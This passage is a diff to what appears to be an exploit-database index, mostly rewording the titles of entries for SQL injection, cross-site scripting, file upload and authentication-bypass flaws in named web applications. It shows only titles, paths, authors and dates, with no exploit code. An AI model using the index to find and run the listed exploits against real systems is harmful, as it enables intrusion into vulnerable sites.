Vulnerabilities",2010-12-21,db.pub.mail,php,webapps,0 -35125,platforms/php/webapps/35125.txt,"OpenFiler - 'device' Parameter Cross-Site Scripting",2010-12-21,db.pub.mail,php,webapps,0 +35125,platforms/php/webapps/35125.txt,"OpenFiler - 'device' Cross-Site Scripting",2010-12-21,db.pub.mail,php,webapps,0 35126,platforms/php/webapps/35126.txt,"Habari 0.6.5 - Multiple Cross-Site Scripting Vulnerabilities",2010-12-21,"High-Tech Bridge SA",php,webapps,0 35128,platforms/hardware/webapps/35128.txt,"ZTE Modem ZXDSL 531BIIV7.3.0f_D09_IN - Persistent Cross-Site Scripting",2014-10-31,"Ravi Rajput",hardware,webapps,0 35129,platforms/php/webapps/35129.txt,"Who's Who Script - Cross-Site Request Forgery (Add Admin)",2014-10-31,"ZoRLu Bugrahan",php,webapps,0 -35131,platforms/php/webapps/35131.txt,"Social Share - 'Username' Parameter SQL Injection",2010-12-21,"Aliaksandr Hartsuyeu",php,webapps,0 +35131,platforms/php/webapps/35131.txt,"Social Share - 'Username' SQL Injection",2010-12-21,"Aliaksandr Hartsuyeu",php,webapps,0 35133,platforms/php/webapps/35133.txt,"WordPress Plugin Mediatricks Viva Thumbs - Multiple Information Disclosure Vulnerabilities",2010-12-21,"Richard Brain",php,webapps,0 -35134,platforms/php/webapps/35134.txt,"ImpressCMS 1.2.x - 'quicksearch_ContentContent' Parameter HTML Injection",2010-12-21,"High-Tech Bridge SA",php,webapps,0 +35134,platforms/php/webapps/35134.txt,"ImpressCMS 1.2.x - 'quicksearch_ContentContent' HTML Injection",2010-12-21,"High-Tech Bridge SA",php,webapps,0 35135,platforms/php/webapps/35135.txt,"Joomla! Component Classified - SQL Injection",2010-12-22,R4dc0re,php,webapps,0 -35136,platforms/php/webapps/35136.txt,"WordPress Plugin Accept Signups 0.1 - 'email' Parameter Cross-Site Scripting",2010-12-22,clshack,php,webapps,0 +35136,platforms/php/webapps/35136.txt,"WordPress Plugin Accept Signups 0.1 - 'email' Cross-Site Scripting",2010-12-22,clshack,php,webapps,0 35137,platforms/php/webapps/35137.txt,"Social Share - 'vote.php' HTTP Response Splitting",2010-12-10,"Aliaksandr Hartsuyeu",php,webapps,0 35138,platforms/php/webapps/35138.txt,"Esotalk CMS 1.0.0g4 - Cross-Site Scripting",2014-11-02,evi1m0,php,webapps,0 35212,platforms/php/webapps/35212.txt,"WordPress Plugin / Joomla! Component XCloner - Multiple Vulnerabilities",2014-11-10,"Larry W. Cashdollar",php,webapps,80 -35140,platforms/php/webapps/35140.txt,"MyBB 1.6 - search.php keywords Parameter SQL Injection",2010-12-23,"Aung Khant",php,webapps,0 -35141,platforms/php/webapps/35141.txt,"MyBB 1.6 - private.php keywords Parameter SQL Injection",2010-12-23,"Aung Khant",php,webapps,0 -35142,platforms/php/webapps/35142.txt,"Social Share - 'search' Parameter Cross-Site Scripting",2010-12-23,"Aliaksandr Hartsuyeu",php,webapps,0 -35143,platforms/php/webapps/35143.txt,"HotWeb Scripts HotWeb Rentals - 'PageId' Parameter SQL Injection",2010-12-28,"non customers",php,webapps,0 -35145,platforms/php/webapps/35145.txt,"Pligg CMS 1.1.3 - 'range' Parameter SQL Injection",2010-12-27,Dr.NeT,php,webapps,0 +35140,platforms/php/webapps/35140.txt,"MyBB 1.6 - 'search.php?keywords' SQL Injection",2010-12-23,"Aung Khant",php,webapps,0 +35141,platforms/php/webapps/35141.txt,"MyBB 1.6 - 'private.php?keywords' SQL Injection",2010-12-23,"Aung Khant",php,webapps,0 +35142,platforms/php/webapps/35142.txt,"Social Share - 'search' Cross-Site Scripting",2010-12-23,"Aliaksandr Hartsuyeu",php,webapps,0 +35143,platforms/php/webapps/35143.txt,"HotWeb Scripts HotWeb Rentals - 'PageId' SQL Injection",2010-12-28,"non customers",php,webapps,0 +35145,platforms/php/webapps/35145.txt,"Pligg CMS 1.1.3 - 'range' SQL Injection",2010-12-27,Dr.NeT,php,webapps,0 35146,platforms/php/webapps/35146.txt,"PHP < 5.6.2 - 'disable_functions()' Bypass Exploit (Shellshock)",2014-11-03,"Ryan King (Starfall)",php,webapps,0 35149,platforms/php/webapps/35149.txt,"LiveZilla 3.2.0.2 - 'Track' Module 'server.php' Cross-Site Scripting",2010-12-27,"Ulisses Castro",php,webapps,0 35150,platforms/php/webapps/35150.php,"Drupal < 7.32 - Unauthenticated SQL Injection",2014-11-03,"Stefan Horst",php,webapps,443 @@ -34709,10 +34710,10 @@ id,file,description,date,author,platform,type,port 35159,platforms/php/webapps/35159.txt,"MODx CMS 2.2.14 - Cross-Site Request Forgery Bypass / Reflected Cross-Site Scripting / Persistent Cross-Site Scripting",2014-11-05,"Narendra Bhati",php,webapps,0 35160,platforms/php/webapps/35160.txt,"Mouse Media Script 1.6 - Persistent Cross-Site Scripting",2014-11-05,"Halil Dalabasmaz",php,webapps,0 35165,platforms/php/webapps/35165.txt,"WikLink 0.1.3 - 'getURL.php' SQL Injection",2011-01-05,"Aliaksandr Hartsuyeu",php,webapps,0 -35167,platforms/php/webapps/35167.txt,"Joomla! 1.0.x - 'ordering' Parameter Cross-Site Scripting",2011-01-06,"Aung Khant",php,webapps,0 +35167,platforms/php/webapps/35167.txt,"Joomla! 1.0.x - 'ordering' Cross-Site Scripting",2011-01-06,"Aung Khant",php,webapps,0 35168,platforms/asp/webapps/35168.txt,"BlogEngine.NET 1.6 - Directory Traversal / Information Disclosure",2011-01-05,"Deniz Cevik",asp,webapps,0 35169,platforms/jsp/webapps/35169.txt,"Openfire 3.6.4 - Multiple Cross-Site Scripting Vulnerabilities",2011-01-05,"Walikar Riyaz Ahemed Dawalmalik",jsp,webapps,0 -35172,platforms/php/webapps/35172.txt,"PHP MicroCMS 1.0.1 - 'page_text' Parameter Cross-Site Scripting",2011-01-06,"High-Tech Bridge SA",php,webapps,0 +35172,platforms/php/webapps/35172.txt,"PHP MicroCMS 1.0.1 - 'page_text' Cross-Site Scripting",2011-01-06,"High-Tech Bridge SA",php,webapps,0 35181,platforms/jsp/webapps/35181.txt,"Symantec Endpoint Protection 12.1.4023.4080 - Multiple Vulnerabilities",2014-11-06,"SEC Consult",jsp,webapps,0 35185,platforms/php/webapps/35185.txt,"WonderCMS 0.3.3 - 'editText.php' Cross-Site Scripting",2011-01-04,"High-Tech Bridge SA",php,webapps,0 35186,platforms/php/webapps/35186.txt,"WikLink 0.1.3 - Multiple SQL Injections",2011-01-10,"Aliaksandr Hartsuyeu",php,webapps,0 @@ -34726,24 +34727,24 @@ id,file,description,date,author,platform,type,port 35204,platforms/php/webapps/35204.txt,"WordPress Plugin Another WordPress Classifieds Plugin - SQL Injection",2014-11-10,dill,php,webapps,0 35206,platforms/php/webapps/35206.txt,"PHP-Fusion 7.02.07 - SQL Injection",2014-11-10,"XLabs Security",php,webapps,0 35313,platforms/php/webapps/35313.txt,"WordPress Plugin SP Client Document Manager 2.4.1 - SQL Injection",2014-11-21,"ITAS Team",php,webapps,80 -35208,platforms/hardware/webapps/35208.txt,"Barracuda - Multiple Anauthentificated Logfile Download",2014-11-10,4CKnowLedge,hardware,webapps,0 +35208,platforms/hardware/webapps/35208.txt,"Barracuda - Multiple Unauthentication Logfile Downloads",2014-11-10,4CKnowLedge,hardware,webapps,0 35292,platforms/php/webapps/35292.html,"vBSEO 3.2.2/3.5.2 - Multiple Cross-Site Scripting Vulnerabilities",2011-01-30,MaXe,php,webapps,0 -35291,platforms/php/webapps/35291.txt,"Vanilla Forums 2.0.16 - 'Target' Parameter Cross-Site Scripting",2011-01-27,"YGN Ethical Hacker Group",php,webapps,0 +35291,platforms/php/webapps/35291.txt,"Vanilla Forums 2.0.16 - 'Target' Cross-Site Scripting",2011-01-27,"YGN Ethical Hacker Group",php,webapps,0 35295,platforms/php/webapps/35295.txt,"Joomla! Component com_frontenduseraccess - Local File Inclusion",2011-02-01,wishnusakti,php,webapps,0 -35296,platforms/php/webapps/35296.txt,"eSyndiCat Directory Software 2.2/2.3 - 'preview' Parameter Cross-Site Scripting",2011-01-30,"Avram Marius",php,webapps,0 +35296,platforms/php/webapps/35296.txt,"eSyndiCat Directory Software 2.2/2.3 - 'preview' Cross-Site Scripting",2011-01-30,"Avram Marius",php,webapps,0 35297,platforms/php/webapps/35297.txt,"Moodle 2.0.1 - 'PHPCOVERAGE_HOME' Cross-Site Scripting",2011-02-01,"AutoSec Tools",php,webapps,0 35298,platforms/php/webapps/35298.txt,"TinyWebGallery 1.8.3 - Cross-Site Scripting / Local File Inclusion",2011-02-01,"Yam Mesicka",php,webapps,0 -35221,platforms/php/webapps/35221.txt,"Piwigo 2.6.0 - 'picture.php rate' Parameter SQL Injection",2014-11-13,"Manuel García Cárdenas",php,webapps,80 +35221,platforms/php/webapps/35221.txt,"Piwigo 2.6.0 - 'picture.php?rate' SQL Injection",2014-11-13,"Manuel García Cárdenas",php,webapps,80 35218,platforms/php/webapps/35218.txt,"WordPress Plugin SupportEzzy Ticket System 1.2.5 - Persistent Cross-Site Scripting",2014-11-12,"Halil Dalabasmaz",php,webapps,80 35219,platforms/multiple/webapps/35219.txt,"Proticaret E-Commerce Script 3.0 - SQL Injection (1)",2014-11-13,"Onur Alanbel (BGA)",multiple,webapps,0 35220,platforms/multiple/webapps/35220.txt,"Joomla! Component com_hdflvplayer < 2.1.0.1 - SQL Injection",2014-11-13,"Claudio Viviani",multiple,webapps,0 35222,platforms/jsp/webapps/35222.txt,"F5 BIG-IP 10.1.0 - Directory Traversal",2014-11-13,"Anastasios Monachos",jsp,webapps,0 35223,platforms/php/webapps/35223.txt,"Digi Online Examination System 2.0 - Unrestricted Arbitrary File Upload",2014-11-13,"Halil Dalabasmaz",php,webapps,80 35224,platforms/php/webapps/35224.txt,"MyBB 1.8.x - Multiple Vulnerabilities",2014-11-13,smash,php,webapps,80 -35227,platforms/php/webapps/35227.txt,"Alguest 1.1c-patched - 'elimina' Parameter SQL Injection",2011-01-14,"Aliaksandr Hartsuyeu",php,webapps,0 +35227,platforms/php/webapps/35227.txt,"Alguest 1.1c-patched - 'elimina' SQL Injection",2011-01-14,"Aliaksandr Hartsuyeu",php,webapps,0 35228,platforms/php/webapps/35228.txt,"CompactCMS 1.4.1 - Multiple Cross-Site Scripting Vulnerabilities (2)",2011-01-15,"Patrick de Brouwer",php,webapps,0 -35231,platforms/php/webapps/35231.txt,"Advanced Webhost Billing System (AWBS) 2.9.2 - 'oid' Parameter SQL Injection",2011-01-16,ShivX,php,webapps,0 -35233,platforms/multiple/webapps/35233.txt,"B-Cumulus - 'tagcloud' Parameter Multiple Cross-Site Scripting Vulnerabilities",2011-01-18,MustLive,multiple,webapps,0 +35231,platforms/php/webapps/35231.txt,"Advanced Webhost Billing System (AWBS) 2.9.2 - 'oid' SQL Injection",2011-01-16,ShivX,php,webapps,0 +35233,platforms/multiple/webapps/35233.txt,"B-Cumulus - 'tagcloud' Multiple Cross-Site Scripting Vulnerabilities",2011-01-18,MustLive,multiple,webapps,0 35237,platforms/multiple/webapps/35237.txt,"Gogs (label pararm) - SQL Injection",2014-11-14,"Timo Schmid",multiple,webapps,80 35238,platforms/multiple/webapps/35238.txt,"Gogs - users and repos q SQL Injection",2014-11-14,"Timo Schmid",multiple,webapps,0 35239,platforms/php/webapps/35239.txt,"phpCMS 2008 V2 - 'data.php' SQL Injection",2011-01-17,R3d-D3V!L,php,webapps,0 @@ -34751,48 +34752,48 @@ id,file,description,date,author,platform,type,port 35246,platforms/php/webapps/35246.py,"Joomla! Component com_hdflvplayer < 2.1.0.1 - Arbitrary File Download",2014-11-15,"Claudio Viviani",php,webapps,0 35248,platforms/multiple/webapps/35248.txt,"clientResponse Client Management 4.1 - Cross-Site Scripting",2014-11-15,"Halil Dalabasmaz",multiple,webapps,0 35293,platforms/php/webapps/35293.txt,"Joomla! Component com_virtuemart 1.1.6 - SQL Injection",2011-01-31,"Andrea Fabrizi",php,webapps,0 -35288,platforms/php/webapps/35288.txt,"WordPress Plugin oQey-Gallery 0.2 - 'tbpv_domain' Parameter Cross-Site Scripting",2011-01-24,"AutoSec Tools",php,webapps,0 -35289,platforms/php/webapps/35289.txt,"WordPress Plugin FCChat Widget 2.1.7 - 'path' Parameter Cross-Site Scripting",2011-01-25,"AutoSec Tools",php,webapps,0 +35288,platforms/php/webapps/35288.txt,"WordPress Plugin oQey-Gallery 0.2 - 'tbpv_domain' Cross-Site Scripting",2011-01-24,"AutoSec Tools",php,webapps,0 +35289,platforms/php/webapps/35289.txt,"WordPress Plugin FCChat Widget 2.1.7 - 'path' Cross-Site Scripting",2011-01-25,"AutoSec Tools",php,webapps,0 35290,platforms/php/webapps/35290.txt,"SimpGB 1.49.2 - 'Guestbook.php' Multiple Cross-Site Scripting Vulnerabilities",2011-01-26,MustLive,php,webapps,0 35251,platforms/php/webapps/35251.txt,"Pixie CMS 1.0.4 - 'admin/index.php' SQL Injection",2011-01-20,"High-Tech Bridge SA",php,webapps,0 -35253,platforms/php/webapps/35253.txt,"web@all 1.1 - 'url' Parameter Cross-Site Scripting",2011-01-25,"AutoSec Tools",php,webapps,0 +35253,platforms/php/webapps/35253.txt,"web@all 1.1 - 'url' Cross-Site Scripting",2011-01-25,"AutoSec Tools",php,webapps,0 35254,platforms/php/webapps/35254.txt,"PivotX 2.2.2 - 'module_image.php' Cross-Site Scripting",2011-01-25,"AutoSec Tools",php,webapps,0 -35255,platforms/php/webapps/35255.txt,"WordPress Plugin Uploader 1.0 - 'num' Parameter Cross-Site Scripting",2011-01-24,"AutoSec Tools",php,webapps,0 +35255,platforms/php/webapps/35255.txt,"WordPress Plugin Uploader 1.0 - 'num' Cross-Site Scripting",2011-01-24,"AutoSec Tools",php,webapps,0 35256,platforms/cfm/webapps/35256.txt,"ActiveWeb Professional 3.0 - Arbitrary File Upload",2011-01-25,StenoPlasma,cfm,webapps,0 -35257,platforms/php/webapps/35257.txt,"WordPress Plugin Videox7 UGC 2.5.3.2 - 'listid' Parameter Cross-Site Scripting",2011-01-25,"AutoSec Tools",php,webapps,0 -35258,platforms/php/webapps/35258.txt,"WordPress Plugin Audio 0.5.1 - 'showfile' Parameter Cross-Site Scripting",2011-01-23,"AutoSec Tools",php,webapps,0 -35259,platforms/php/webapps/35259.txt,"PivotX 2.2 - pivotx/includes/blogroll.php color Parameter Cross-Site Scripting",2011-01-25,"High-Tech Bridge SA",php,webapps,0 -35260,platforms/php/webapps/35260.txt,"PivotX 2.2 - pivotx/includes/timwrapper.php src Parameter Cross-Site Scripting",2011-01-25,"High-Tech Bridge SA",php,webapps,0 -35261,platforms/php/webapps/35261.txt,"WordPress Plugin RSS Feed Reader 0.1 - 'rss_url' Parameter Cross-Site Scripting",2011-01-23,"AutoSec Tools",php,webapps,0 -35262,platforms/php/webapps/35262.txt,"WordPress Plugin WP Featured Post with Thumbnail 3.0 - 'src' Parameter Cross-Site Scripting",2011-01-23,"AutoSec Tools",php,webapps,0 -35263,platforms/php/webapps/35263.txt,"WordPress Plugin WP Publication Archive 2.0.1 - 'file' Parameter Information Disclosure",2011-01-23,"AutoSec Tools",php,webapps,0 -35264,platforms/php/webapps/35264.txt,"WordPress Plugin Featured Content 0.0.1 - 'listid' Parameter Cross-Site Scripting",2011-01-25,"AutoSec Tools",php,webapps,0 +35257,platforms/php/webapps/35257.txt,"WordPress Plugin Videox7 UGC 2.5.3.2 - 'listid' Cross-Site Scripting",2011-01-25,"AutoSec Tools",php,webapps,0 +35258,platforms/php/webapps/35258.txt,"WordPress Plugin Audio 0.5.1 - 'showfile' Cross-Site Scripting",2011-01-23,"AutoSec Tools",php,webapps,0 +35259,platforms/php/webapps/35259.txt,"PivotX 2.2 - 'pivotx/includes/blogroll.php?color' Cross-Site Scripting",2011-01-25,"High-Tech Bridge SA",php,webapps,0 +35260,platforms/php/webapps/35260.txt,"PivotX 2.2 - 'pivotx/includes/timwrapper.php?src' Cross-Site Scripting",2011-01-25,"High-Tech Bridge SA",php,webapps,0 +35261,platforms/php/webapps/35261.txt,"WordPress Plugin RSS Feed Reader 0.1 - 'rss_url' Cross-Site Scripting",2011-01-23,"AutoSec Tools",php,webapps,0 +35262,platforms/php/webapps/35262.txt,"WordPress Plugin WP Featured Post with Thumbnail 3.0 - 'src' Cross-Site Scripting",2011-01-23,"AutoSec Tools",php,webapps,0 +35263,platforms/php/webapps/35263.txt,"WordPress Plugin WP Publication Archive 2.0.1 - 'file' Information Disclosure",2011-01-23,"AutoSec Tools",php,webapps,0 +35264,platforms/php/webapps/35264.txt,"WordPress Plugin Featured Content 0.0.1 - 'listid' Cross-Site Scripting",2011-01-25,"AutoSec Tools",php,webapps,0 35265,platforms/php/webapps/35265.php,"WordPress Plugin Recip.ly 1.1.7 - 'uploadImage.php' Arbitrary File Upload",2011-01-25,"AutoSec Tools",php,webapps,0 35266,platforms/php/webapps/35266.txt,"MyBB Forums 1.8.2 - Persistent Cross-Site Scripting",2014-11-17,"Avinash Thapa",php,webapps,0 35272,platforms/hardware/webapps/35272.txt,"ZTE ZXHN H108L - Authentication Bypass (1)",2014-11-17,"Project Zero Labs",hardware,webapps,0 35271,platforms/php/webapps/35271.txt,"Maarch LetterBox 2.8 - Insecure Cookies (Login Bypass)",2014-11-17,"ZoRLu Bugrahan",php,webapps,0 -35285,platforms/php/webapps/35285.txt,"WordPress Plugin Feature Slideshow 1.0.6 - 'src' Parameter Cross-Site Scripting",2011-01-24,"AutoSec Tools",php,webapps,0 -35286,platforms/php/webapps/35286.txt,"WordPress Plugin BezahlCode Generator 1.0 - 'gen_name' Parameter Cross-Site Scripting",2011-01-25,"AutoSec Tools",php,webapps,0 -35287,platforms/php/webapps/35287.txt,"WordPress Plugin Powerhouse Museum Collection Image Grid 0.9.1.1 - 'tbpv_username' Parameter Cross-Site Scripting",2011-01-24,"AutoSec Tools",php,webapps,0 +35285,platforms/php/webapps/35285.txt,"WordPress Plugin Feature Slideshow 1.0.6 - 'src' Cross-Site Scripting",2011-01-24,"AutoSec Tools",php,webapps,0 +35286,platforms/php/webapps/35286.txt,"WordPress Plugin BezahlCode Generator 1.0 - 'gen_name' Cross-Site Scripting",2011-01-25,"AutoSec Tools",php,webapps,0 +35287,platforms/php/webapps/35287.txt,"WordPress Plugin Powerhouse Museum Collection Image Grid 0.9.1.1 - 'tbpv_username' Cross-Site Scripting",2011-01-24,"AutoSec Tools",php,webapps,0 35274,platforms/php/webapps/35274.txt,"PHPFox - Persistent Cross-Site Scripting",2014-11-17,spyk2r,php,webapps,80 35275,platforms/xml/webapps/35275.txt,"Proticaret E-Commerce Script 3.0 - SQL Injection (2)",2014-11-17,"BGA Security",xml,webapps,80 35276,platforms/hardware/webapps/35276.txt,"ZTE ZXHN H108L - Authentication Bypass (2)",2014-11-17,"Project Zero Labs",hardware,webapps,80 35277,platforms/php/webapps/35277.txt,"WebsiteBaker 2.8.3 - Multiple Vulnerabilities",2014-11-17,"Manuel García Cárdenas",php,webapps,80 35278,platforms/php/webapps/35278.txt,"Zoph 0.9.1 - Multiple Vulnerabilities",2014-11-17,"Manuel García Cárdenas",php,webapps,80 -35294,platforms/php/webapps/35294.txt,"Joomla! Component com_clan_members - 'id' Parameter SQL Injection",2011-02-01,FL0RiX,php,webapps,0 -35300,platforms/php/webapps/35300.txt,"WordPress Plugin TagNinja 1.0 - 'id' Parameter Cross-Site Scripting",2011-02-01,"AutoSec Tools",php,webapps,0 +35294,platforms/php/webapps/35294.txt,"Joomla! Component com_clan_members - 'id' SQL Injection",2011-02-01,FL0RiX,php,webapps,0 +35300,platforms/php/webapps/35300.txt,"WordPress Plugin TagNinja 1.0 - 'id' Cross-Site Scripting",2011-02-01,"AutoSec Tools",php,webapps,0 35301,platforms/php/webapps/35301.html,"Snowfox CMS 1.0 - Cross-Site Request Forgery (Add Admin)",2014-11-19,LiquidWorm,php,webapps,80 35303,platforms/php/webapps/35303.txt,"WordPress Plugin Paid Memberships Pro 1.7.14.2 - Directory Traversal",2014-11-19,"Kacper Szurek",php,webapps,80 -35305,platforms/php/webapps/35305.txt,"ACollab - 't' Parameter SQL Injection",2011-02-01,"AutoSec Tools",php,webapps,0 -35306,platforms/php/webapps/35306.txt,"TCExam 11.1.16 - 'user_password' Parameter Cross-Site Scripting",2011-02-02,"AutoSec Tools",php,webapps,0 +35305,platforms/php/webapps/35305.txt,"ACollab - 't' SQL Injection",2011-02-01,"AutoSec Tools",php,webapps,0 +35306,platforms/php/webapps/35306.txt,"TCExam 11.1.16 - 'user_password' Cross-Site Scripting",2011-02-02,"AutoSec Tools",php,webapps,0 35307,platforms/php/webapps/35307.py,"All In One Control Panel 1.4.1 - 'cp_menu_data_file.php' SQL Injection",2011-01-31,"AutoSec Tools",php,webapps,0 -35309,platforms/php/webapps/35309.txt,"Betsy 4.0 - 'page' Parameter Local File Inclusion",2011-02-02,MizoZ,php,webapps,0 +35309,platforms/php/webapps/35309.txt,"Betsy 4.0 - 'page' Local File Inclusion",2011-02-02,MizoZ,php,webapps,0 35310,platforms/asp/webapps/35310.txt,"Web Wiz Forums 9.5 - Multiple SQL Injections",2011-03-23,eXeSoul,asp,webapps,0 35311,platforms/php/webapps/35311.txt,"Octeth Oempro 3.6.4 - SQL Injection / Information Disclosure",2011-02-03,"Ignacio Garrido",php,webapps,0 35312,platforms/php/webapps/35312.txt,"Firebook - 'index.html' Cross-Site Scripting",2011-02-03,MustLive,php,webapps,0 35567,platforms/php/webapps/35567.txt,"Eleanor CMS - Cross-Site Scripting / Multiple SQL Injections",2011-04-05,"High-Tech Bridge SA",php,webapps,0 35568,platforms/php/webapps/35568.txt,"UseBB 1.0.11 - 'admin.php' Local File Inclusion",2011-04-05,"High-Tech Bridge SA",php,webapps,0 -35315,platforms/php/webapps/35315.txt,"Escortservice 1.0 - 'custid' Parameter SQL Injection",2011-02-07,NoNameMT,php,webapps,0 +35315,platforms/php/webapps/35315.txt,"Escortservice 1.0 - 'custid' SQL Injection",2011-02-07,NoNameMT,php,webapps,0 35319,platforms/php/webapps/35319.txt,"WebAsyst Shop-Script - Cross-Site Scripting / HTML Injection",2011-02-08,"High-Tech Bridge SA",php,webapps,0 35320,platforms/php/webapps/35320.txt,"ViArt Shop 4.0.5 - Multiple Cross-Site Scripting Vulnerabilities",2011-02-08,"High-Tech Bridge SA",php,webapps,0 35381,platforms/php/webapps/35381.txt,"xEpan 1.0.1 - Cross-Site Request Forgery",2014-11-26,"High-Tech Bridge SA",php,webapps,80 @@ -34803,20 +34804,20 @@ id,file,description,date,author,platform,type,port 35328,platforms/php/webapps/35328.txt,"UMI CMS 2.8.1.2 - Multiple Cross-Site Scripting Vulnerabilities",2011-02-08,"High-Tech Bridge SA",php,webapps,0 35329,platforms/php/webapps/35329.txt,"PHPXref 0.7 - 'nav.html' Cross-Site Scripting",2011-02-09,MustLive,php,webapps,0 35330,platforms/php/webapps/35330.txt,"ManageEngine ADSelfService Plus 4.4 - POST Manipulation Security Question",2011-02-10,"Core Security",php,webapps,0 -35331,platforms/php/webapps/35331.txt,"ManageEngine ADSelfService Plus 4.4 - EmployeeSearch.cc Multiple Parameter Cross-Site Scripting",2011-02-10,"Core Security",php,webapps,0 +35331,platforms/php/webapps/35331.txt,"ManageEngine ADSelfService Plus 4.4 - 'EmployeeSearch.cc' Multiple Cross-Site Scripting Vulnerabilities",2011-02-10,"Core Security",php,webapps,0 35332,platforms/php/webapps/35332.txt,"Dolphin 7.0.4 - Multiple Cross-Site Scripting Vulnerabilities",2011-02-10,"AutoSec Tools",php,webapps,0 35333,platforms/php/webapps/35333.py,"webERP 4.0.1 - 'InputSerialItemsFile.php' Arbitrary File Upload",2011-02-10,"AutoSec Tools",php,webapps,0 35334,platforms/php/webapps/35334.txt,"RunCMS 2.2.2 - 'register.php' SQL Injection",2011-02-10,"High-Tech Bridge SA",php,webapps,0 35335,platforms/php/webapps/35335.html,"Drupal Module CAPTCHA - Security Bypass",2011-02-11,anonymous,php,webapps,0 -35336,platforms/php/webapps/35336.txt,"TaskFreak! 0.6.4 - 'index.php' Multiple Parameter Cross-Site Scripting",2011-02-12,LiquidWorm,php,webapps,0 -35337,platforms/php/webapps/35337.txt,"TaskFreak! 0.6.4 - print_list.php Multiple Parameter Cross-Site Scripting",2011-02-12,LiquidWorm,php,webapps,0 +35336,platforms/php/webapps/35336.txt,"TaskFreak! 0.6.4 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2011-02-12,LiquidWorm,php,webapps,0 +35337,platforms/php/webapps/35337.txt,"TaskFreak! 0.6.4 - 'print_list.php' Multiple Cross-Site Scripting Vulnerabilities",2011-02-12,LiquidWorm,php,webapps,0 35338,platforms/php/webapps/35338.txt,"TaskFreak! 0.6.4 - rss.php HTTP Referer Header Cross-Site Scripting",2011-02-12,LiquidWorm,php,webapps,0 35340,platforms/php/webapps/35340.txt,"WordPress Plugin wpDataTables 1.5.3 - SQL Injection",2014-11-24,"Claudio Viviani",php,webapps,0 35341,platforms/php/webapps/35341.py,"WordPress Plugin wpDataTables 1.5.3 - Unauthenticated Arbitrary File Upload",2014-11-24,"Claudio Viviani",php,webapps,0 35343,platforms/php/webapps/35343.txt,"Smarty Template Engine 2.6.9 - '$smarty.template' PHP Code Injection",2011-02-09,jonieske,php,webapps,0 35344,platforms/php/webapps/35344.txt,"RobotStats 1.0 - (robot Parameter) SQL Injection",2014-11-24,"ZoRLu Bugrahan",php,webapps,0 35346,platforms/php/webapps/35346.txt,"WordPress Plugin DukaPress 2.5.2 - Directory Traversal",2014-11-24,"Kacper Szurek",php,webapps,0 -35347,platforms/php/webapps/35347.txt,"Dokeos 1.8.6 2 - 'style' Parameter Cross-Site Scripting",2011-02-12,"AutoSec Tools",php,webapps,0 +35347,platforms/php/webapps/35347.txt,"Dokeos 1.8.6 2 - 'style' Cross-Site Scripting",2011-02-12,"AutoSec Tools",php,webapps,0 35348,platforms/php/webapps/35348.txt,"MG2 0.5.1 - Multiple Cross-Site Scripting Vulnerabilities",2011-02-15,LiquidWorm,php,webapps,0 35349,platforms/php/webapps/35349.txt,"Gollos 2.8 - Multiple Cross-Site Scripting Vulnerabilities",2011-02-15,"High-Tech Bridge SA",php,webapps,0 35350,platforms/php/webapps/35350.txt,"Wikipad 1.6.0 - Cross-Site Scripting / HTML Injection / Information Disclosure",2011-02-15,"High-Tech Bridge SA",php,webapps,0 @@ -34825,47 +34826,47 @@ id,file,description,date,author,platform,type,port 35357,platforms/cgi/webapps/35357.txt,"Advantech EKI-6340 - Command Injection",2014-11-24,"Core Security",cgi,webapps,80 35360,platforms/php/webapps/35360.txt,"WSN Guest 1.24 - 'wsnuser' Cookie Parameter SQL Injection",2011-02-18,"Aliaksandr Hartsuyeu",php,webapps,0 35362,platforms/php/webapps/35362.txt,"Batavi 1.0 - Multiple Local File Inclusion / Cross-Site Scripting Vulnerabilities",2011-02-21,"AutoSec Tools",php,webapps,0 -35365,platforms/php/webapps/35365.py,"PHPMyRecipes 1.2.2 - 'dosearch.php words_exact Parameter SQL Injection",2014-11-25,bard,php,webapps,80 +35365,platforms/php/webapps/35365.py,"PHPMyRecipes 1.2.2 - 'dosearch.php?words_exact' SQL Injection",2014-11-25,bard,php,webapps,80 35367,platforms/php/webapps/35367.txt,"Crea8Social 1.3 - Persistent Cross-Site Scripting",2014-11-25,"Halil Dalabasmaz",php,webapps,80 35371,platforms/php/webapps/35371.txt,"WordPress Plugin Google Document Embedder 2.5.14 - SQL Injection",2014-11-25,"Kacper Szurek",php,webapps,80 35372,platforms/hardware/webapps/35372.rb,"Arris VAP2500 - Authentication Bypass",2014-11-25,HeadlessZeke,hardware,webapps,80 -35373,platforms/php/webapps/35373.txt,"WordPress Plugin GD Star Rating 1.9.7 - 'wpfn' Parameter Cross-Site Scripting",2011-02-22,"High-Tech Bridge SA",php,webapps,0 +35373,platforms/php/webapps/35373.txt,"WordPress Plugin GD Star Rating 1.9.7 - 'wpfn' Cross-Site Scripting",2011-02-22,"High-Tech Bridge SA",php,webapps,0 35374,platforms/php/webapps/35374.txt,"IBM Lotus Sametime Server 8.0 - 'stcenter.nsf' Cross-Site Scripting",2011-02-22,andrew,php,webapps,0 -35375,platforms/php/webapps/35375.txt,"Vanilla Forums 2.0.17.x - 'p' Parameter Cross-Site Scripting",2011-02-22,"Aung Khant",php,webapps,0 -35376,platforms/php/webapps/35376.txt,"mySeatXT 0.164 - 'lang' Parameter Local File Inclusion",2011-02-16,"AutoSec Tools",php,webapps,0 +35375,platforms/php/webapps/35375.txt,"Vanilla Forums 2.0.17.x - 'p' Cross-Site Scripting",2011-02-22,"Aung Khant",php,webapps,0 +35376,platforms/php/webapps/35376.txt,"mySeatXT 0.164 - 'lang' Local File Inclusion",2011-02-16,"AutoSec Tools",php,webapps,0 35378,platforms/php/webapps/35378.txt,"WordPress Plugin DB Backup - Arbitrary File Download",2014-11-26,"Ashiyane Digital Security Team",php,webapps,80 35383,platforms/cgi/webapps/35383.rb,"Device42 WAN Emulator 2.3 - Traceroute Command Injection (Metasploit)",2014-11-26,"Brandon Perry",cgi,webapps,80 35384,platforms/cgi/webapps/35384.rb,"Device42 WAN Emulator 2.3 - Ping Command Injection (Metasploit)",2014-11-26,"Brandon Perry",cgi,webapps,80 35385,platforms/php/webapps/35385.pl,"WordPress Plugin Slider REvolution 3.0.95 / Showbiz Pro 1.7.1 - Arbitrary File Upload",2014-11-26,"Simo Ben Youssef",php,webapps,80 -35387,platforms/php/webapps/35387.txt,"phpShop 0.8.1 - 'page' Parameter Cross-Site Scripting",2011-02-25,"Aung Khant",php,webapps,0 +35387,platforms/php/webapps/35387.txt,"phpShop 0.8.1 - 'page' Cross-Site Scripting",2011-02-25,"Aung Khant",php,webapps,0 35391,platforms/php/webapps/35391.txt,"glFusion 1.1.x/1.2.1 